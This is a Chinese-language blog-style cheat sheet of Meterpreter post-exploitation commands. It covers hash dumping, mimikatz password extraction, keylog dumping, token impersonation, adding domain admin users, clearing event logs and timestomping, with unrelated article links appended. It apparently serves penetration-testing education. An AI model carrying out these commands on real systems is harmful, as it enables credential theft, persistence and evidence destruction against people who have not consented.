[后渗透]获取到 Meterpreter 之后的操作
msf解决中文乱码问题:输入 chcp 65001(UTF-8) chcp 437(IBM437英语)
sysinfo
列出受控主机的系统信息
getuid
查看当前操控身份
ls
列出目标主机的文件和文件夹信息
use priv
加载特权提升扩展模块,来扩展meterpreter库
ps
显示所有运行进程以及关联的用户账户
getsystem
通过各种攻击向量来提升到系统用户权限
shell
以所有可用令牌来运行一个交互的shell
screenshot
对目标主机的屏幕进行截图
upload file
向目标主机上传文件
download file
从目标主机下载文件
keyscan_dump
存储目标主机上或许的键盘记录
getprivs
尽可能多的获取目标主机上的特权
background
将你当前的meterpreter shell转为后台执行
help
打开帮助
run scriptname
运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名
migrate PID
迁移到一个指定的进程ID
hashdump
导出目标主机中的口令哈希值
load mimikatz
加载mimikatz模块
msv
ssp
tspkg
wdigest
获取登录密码的hash值
kerberos
获取明文密码
mimikatz_command -f samdump::hashes
另一种方式获取哈希值
mimikatz_command -f sekurlsa::searchPasswords
另一种方式获取明文密码
portfwd add -l 3389 -r 192.168.206.200 -p 3389
把被攻击机的3389端口流量,转发到本地的3389端口上
use incognito
加载inconito功能(用来盗取目标主机的令牌或是假冒用户)
list_tokens -u
列出目标主机用户组的可用令牌
impersonate_token DOMAIN_NAME\\USERNAME
假冒目标主机上的可用令牌。
steal_token
盗窃给定进程的可用令牌并进行令牌假冒
drop_token
停止假冒当前的令牌
execute -f cmd.exe -i
执行cmd.exe命令并进行交互。
execute -f cmd.exe -i -t
以所有可用令牌来执行cmd命令。
execute -f cmd.exe -i -H -t
以所有可用令牌来执行cmd命令并隐藏该进程。
add_user username password -h ip
在远程目标主机上添加一个用户
add_group_user “Domain Adimins”username -h ip
将用户添加到目标主机的域管理员组中
clearev
清除目标主机上的日志记录
timestomp
修改文件属性,例如修改文件的创建时间(反取证调差)
reboot
重启目标主机
rev2self
回到控制目标主机的初始用户账户下。
reg command
在目标主机注册表中进行交互,创建,删除和查询等操作。
setdesktop number
切换到另一个用户界面(该功能基于那些用户已登录)。
uietl enable keyboard/mouse
接管目标主机的键盘和鼠标。
use sniffer
加载嗅探模块
sniffer_interfaces
列出目标主机所有开放的网络接口
sniffer_dump interfaceID pcapname
在目标主机上启动嗅探
sniffer_start interfaceID packet_buffer
在目标主机上针对特定范围的数据包缓冲区启动嗅探
sniffer_stats interfaceID
获取正在实施嗅探网络接口的统计数据
sniffer_stop interfaceID
停止嗅探
[后渗透]获取到 Meterpreter 之后的操作的更多相关文章
- 渗透攻防工具篇-后渗透阶段的Meterpreter
作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23677530来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 前言 熟悉Metasploit ...
- 后渗透之meterpreter使用攻略
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令.脚本及使用方式.包含信息收集.提权.注册表操作.令牌操纵.哈希利用.后门 ...
- Meterpreter后渗透之信息收集
在获得目标的Meterpreter shell后 进行信息收集是后渗透工作的基础 记录一下关于meterpreter 信息收集的使用 环境: kali linux 192.168.190.141 xp ...
- Meterpreter后渗透阶段之远程桌面开启
实验目的 学习利用Meterpreter后渗透阶段模块来开启靶机远程桌面 实验原理 利用Meterpreter生成木马,利用木马控制靶机进行远程桌面的攻击 实验内容 利用Meterpreter后渗透阶 ...
- Metasploit Framework(8)后渗透测试(一)
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 使用场景: Kali机器IP:192.168.163. ...
- 超实用!手把手教你如何用MSF进行后渗透测试!
在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升:后续需要对系统进行全面的分析,搞清楚系统的用途:如果目 ...
- 手把手教你如何用MSF进行后渗透测试!
在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升:后续需要对系统进行全面的分析,搞清楚系统的用途:如果目 ...
- 7.Metasploit后渗透
Metasploit 高阶之后渗透 01信息收集 应用场景: 后渗透的第一步,更多地了解靶机信息,为后续攻击做准备. 02进程迁移 应用场景: 如果反弹的meterpreter会话是对方打开了一个你预 ...
- Metasploit简单使用——后渗透阶段
在上文中我们复现了永恒之蓝漏洞,这里我们学习一下利用msf简单的后渗透阶段的知识/ 一.meterperter常用命令 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详 ...
随机推荐
- jQuery简易Ajax(六)
一.jQuery中ajax的两种书写方式[一般采用第二种方式]1.$.ajax(url,[setting]); 2.$.ajax([setting]); setting参数说明:setting为一个对 ...
- JS项目练习之求和(包含正则表达式验证)
最近在准备专升本,抽一点时间敷衍一下大家!!!嘿嘿嘿!!! 话不多说,上代码: <!DOCTYPE html> <html lang="zh-CN"> &l ...
- 编写可维护的JavaScript-随笔(二)
一.注释 1. 单行注释 a) 以两个斜线开始,以行位结束 b) 独占一行的注释,用来解释下一行的代码, c) 注释行之前总有一个空行 d) 缩进层级与下一行代 ...
- echarts自定义悬浮框的显示
最近在使用echarts的地图功能 ,业务需求是显示前五的具体信息,并且轮流显示,首先解决轮流显示的问题 var counta = 0; //播放所在下标 var mTime = setInterva ...
- js对数组array的常见操作小结
1.创建数组?两种方式 var arr = new Array("1","2","4"); var arr1 = ["1" ...
- i18n,国际化翻译,excel与js互转
背景 公司开发新产品时,要求适配多国语言,采用i18n国际化工具,但翻译字典(js的json)还是需要前端自己写的.字典最终需要转换成excel给专业人员翻译,翻译完成后再转换成js字典文件. 如果手 ...
- css transform解释及demo(基于chrome)
transform 属性向元素应用 2D 或 3D 转换.该属性允许我们对元素进行旋转.缩放.移动或倾斜. Transform:(css3 转换) 注意:这些效果叠加时,中间用空格隔开 作用:能够对元 ...
- PAT 乙级 1007.素数对猜想 C++/Java
1007 素数对猜想 (20 分) 题目来源 让我们定义dn为:dn=pn+1−pn,其中pi是第i个素数.显然有d1=1,且对于n>1有dn是偶数.“ ...
- Codeforces B. Bad Luck Island(概率dp)
题目描述: Bad Luck Island time limit per test 2 seconds memory limit per test 256 megabytes input standa ...
- Python决策树可视化:GraphViz's executables not found的解决方法
参考文献: [1]Python决策树可视化:GraphViz's executables not found的解决方法